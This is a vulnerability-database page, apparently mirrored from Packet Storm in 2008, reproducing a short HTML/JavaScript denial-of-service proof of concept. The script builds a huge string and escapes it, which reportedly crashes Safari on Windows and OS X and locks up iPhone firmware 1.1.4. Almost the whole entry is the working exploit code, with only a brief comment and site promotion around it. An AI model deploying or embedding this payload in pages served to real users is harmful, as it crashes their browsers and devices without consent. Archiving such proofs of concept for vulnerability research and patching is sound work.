Lucene search

K

safariphone-dos.txt

🗓️ 17 Mar 2008 00:00:00Reported by Georgi GuninskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Georgi Guninski's retired code causes crashes in iPhone firmware, Safari on Windows, and Safari on OSX. The code can be exploited to generate a denial of service (DoS) condition.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<!--  
Even though Georgi Guninski retired from the scene, his  
old code is still finding new bugs.  
  
iphone fw:1.1.4 : locks up  
safari win32 : crashes  
safari osx : crashes  
  
looped the x's on milw0rm to find the bug.  
original firefox vuln: http://milw0rm.com/exploits/1233  
/str0ke  
-->  
  
<html>  
Copyright Georgi Guninski  
<br>  
Cannot be used in vulnerability databases  
<br>  
Especially securityfocus/mitre/cve/cert  
<script>  
var s=String.fromCharCode(257);  
var ki="";  
var me="";  
for(i=0;i<1024;i++)  
{ki=ki+s;}  
for(i=0;i<1024;i++)  
{me=me+ki;}  
var ov=s;  
for(i=0;i<28;i++) ov += ov;  
for(i=0;i<88;i++) ov += me;  
  
alert("done generating");  
var fuckbill=escape(ov);  
alert("done escape");  
alert(fuckbill);  
</script>  
</html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4
20
.json
Report